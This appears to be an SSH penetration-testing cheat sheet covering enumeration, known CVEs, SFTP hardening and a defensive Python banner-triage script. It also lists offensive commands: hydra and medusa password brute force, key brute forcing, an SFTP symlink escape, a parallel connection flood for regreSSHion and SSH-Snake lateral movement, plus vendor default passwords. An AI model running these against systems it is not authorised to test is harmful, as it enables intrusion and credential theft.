SSH (Secure Shell) provides a secure encrypted connection to a remote computer. It is essential for maintaining confidentiality and integrity when accessing remote systems.
Default Port: 22
Enumeration
Banner Grabbing
ssh-audit (Configuration Audit)
ssh-audit <IP> # pip-installed; from a git checkout: python3 ssh-audit.py <IP>
# Reports: cipher algorithms, key exchange, host key algorithms, MACs
# Flags deprecated, unsafe, or weak algorithms
Nmap Scripts
nmap -p22 <ip> -sC # Default scripts
nmap -p22 <ip> -sV # Version detection
nmap -p22 <ip> --script ssh2-enum-algos # Supported algorithms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root"
Public Key Scan
ssh-keyscan -t rsa <IP> -p <PORT>
Brute Force
Username Enumeration
# Timing-based username enumeration (some OpenSSH versions)
msf> use auxiliary/scanner/ssh/ssh_enumusers
Password Brute Force
hydra -v -V -u -l <username> -P <Big_Passwordlist> -t 1 <IP> ssh
medusa -u <user> -P <passwordlist> -h <IP> -M ssh
Private Key Brute Force
# Test known private keys against target
nmap --script ssh-publickey-acceptance -p22 <IP>
# SSH-keybrute (lightweight)
python3 ssh-keybrute.py -h <IP> -u <user> -d /path/to/keys/
# Check badkeys database
# https://github.com/rapid7/ssh-badkeys
Debian Weak PRNG Keys
Debian-derived systems affected by the 2008 OpenSSL PRNG bug generated keys from a small, predictable set, so the full key space can be pre-computed:
# Download pre-generated key sets
# https://github.com/g0tmi1k/debian-ssh
Kerberos / GSSAPI SSO
If the SSH server supports GSSAPI (e.g., Windows OpenSSH on a domain controller):
# 1. Sync time with KDC
sudo ntpdate <dc.fqdn>
# 2. Generate krb5.conf
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf
# 3. Obtain TGT
kinit <user>
klist
# 4. SSH with GSSAPI
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
SSH MitM Attack
Requires being on the local network:
- Divert victim’s traffic (ARP spoofing, DNS spoofing)
- SSH-MITM acts as proxy, capturing credentials
- Forwards commands to real server and relays responses
SFTP Misconfigurations
Command Execution Bypass
A non-interactive shell (/usr/bin/nologin) alone does not stop SSH users from running commands on some setups; restrict SFTP-only accounts with ForceCommand instead, as in the configuration below:
SFTP Secure Configuration
Match User noraj
# %h must be owned by root and not group/world-writable, or sshd refuses the chroot
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no
SFTP Symlink Attack
sftp> symlink / froot
# Now accessing froot/ via web returns the root filesystem
SFTP Tunneling
sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>
Critical Vulnerabilities
CVE-2024-6387 – regreSSHion
OpenSSH 8.5p1–9.7p1 on 32-bit Linux: unauthenticated RCE via a signal-handler race condition in the SIGALRM handler. The race only exists while LoginGraceTime is non-zero.
# Check the local OpenSSH version (ssh -V reports the client, not a remote server)
ssh -V
# Fingerprint a remote server's version with nmap (banner-based; distro backports keep the old banner)
nmap -p22 -sV <IP>
# Pressure-test (PoC only - timing-based)
parallel -j200 "timeout 3 ssh -o PreferredAuthentications=none -o ConnectTimeout=2 attacker@${TARGET}" ::: {1..4000}
CVE-2024-3094 – XZ Utils Backdoor
XZ Utils 5.6.0 and 5.6.1 shipped backdoored tarballs that hook RSA_public_decrypt in sshd for pre-auth RCE:
# Check if affected
xz --version
dpkg -l xz-utils
rpm -qi xz
# Check if sshd loads the backdoor (sshd never links liblzma directly; it is pulled in via libsystemd on distros that patch sshd for systemd notification)
ldd /usr/sbin/sshd | grep -E "systemd|lzma"
CVE-2025-32433 – Erlang/OTP Pre-Auth RCE
Affected: OTP releases before 27.3.3, 26.2.5.11 and 25.3.2.20 (one fix per branch)
Fix: Upgrade to those releases or later
Impact: Unauthenticated RCE (daemon usually runs as root)
# Detection: SSH banner shows Erlang/OTP
# Ports: 22, 2022, 830, 2222
libssh CVE-2018-10933
Server-side libssh 0.6–0.8 accepts SSH_MSG_USERAUTH_SUCCESS from client without authentication.
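Added example (not code from the page or from any project it names): a banner triage script that maps an SSH server banner onto the version windows this page lists for regreSSHion, the libssh CVE-2018-10933 bypass and the Erlang/OTP daemon. The libssh fix releases (0.7.6 and 0.8.4) come from the libssh advisory rather than from this page; the sample banners are constructed, and because distributions backport fixes without changing the banner, a hit only marks a host for changelog review.

```python
"""Triage SSH server banners against the vulnerable version windows
listed on this page (regreSSHion, libssh auth bypass, Erlang/OTP ssh).

Version-based triage only: distributions backport fixes without changing
the banner (Debian's OpenSSH_9.2p1 ...deb12u3 is patched), so a hit means
"check the package changelog", never "confirmed vulnerable".
"""
import re

# Version windows as (major, minor, patch-level) tuples, half-open [lower, upper).
# regreSSHion window is from the page; libssh fix releases 0.7.6 / 0.8.4 are
# from the libssh advisory (assumption: not stated on the page).
OPENSSH_REGRESSHION = ((8, 5, 1), (9, 8, 0))                      # CVE-2024-6387
LIBSSH_BYPASS = (((0, 6, 0), (0, 7, 6)), ((0, 8, 0), (0, 8, 4)))  # CVE-2018-10933


def parse_version(banner, product):
    """Return (major, minor, patch) for e.g. 'OpenSSH_9.2p1' or 'libssh_0.8.1', else None."""
    m = re.search(product + r"[_-](\d+)\.(\d+)(?:[.p](\d+))?", banner)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def triage(banner):
    """Return the CVE ids whose version window the banner falls into."""
    hits = []
    v = parse_version(banner, "OpenSSH")
    if v and OPENSSH_REGRESSHION[0] <= v < OPENSSH_REGRESSHION[1]:
        hits.append("CVE-2024-6387")   # still needs LoginGraceTime != 0 on the server
    v = parse_version(banner, "libssh")
    if v and any(lo <= v < hi for lo, hi in LIBSSH_BYPASS):
        hits.append("CVE-2018-10933")  # server side only; libssh clients are unaffected
    if re.search(r"Erlang", banner, re.IGNORECASE):
        hits.append("CVE-2025-32433")  # banner lacks the OTP release; confirm on the host
    return hits


if __name__ == "__main__":
    # Constructed sample banners (not captured from any real host).
    for b in ("SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u3", "SSH-2.0-OpenSSH_9.8p1",
              "SSH-2.0-libssh_0.8.1", "SSH-2.0-Erlang/5.2.3"):
        print(f"{b:45s} -> {triage(b) or 'no listed issue'}")
```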
SSH-Snake (Lateral Movement)
# Automatically find private keys and propagate
# https://github.com/MegaManSec/SSH-Snake
# Discovers keys, finds destinations, attempts SSH, repeats recursively
Default Credentials Reference
| Vendor | Usernames | Passwords |
|---|---|---|
| APC | apc, device | apc |
| Cisco | admin, cisco | admin, cisco123, C1sco!23 |
| Dell | root, admin | calvin, Password123 |
| HP/3Com | admin, root | admin, password, hpinvent |
| VMware | vi-admin, root | vmware, vmw@re |
Config Files
/etc/ssh/ssh_config # System-wide client config
/etc/ssh/sshd_config # Server config
~/.ssh/ # Per-user directory containing:
~/.ssh/authorized_keys # Trusted public keys
~/.ssh/known_hosts # Known server keys
~/.ssh/id_rsa # Default private key location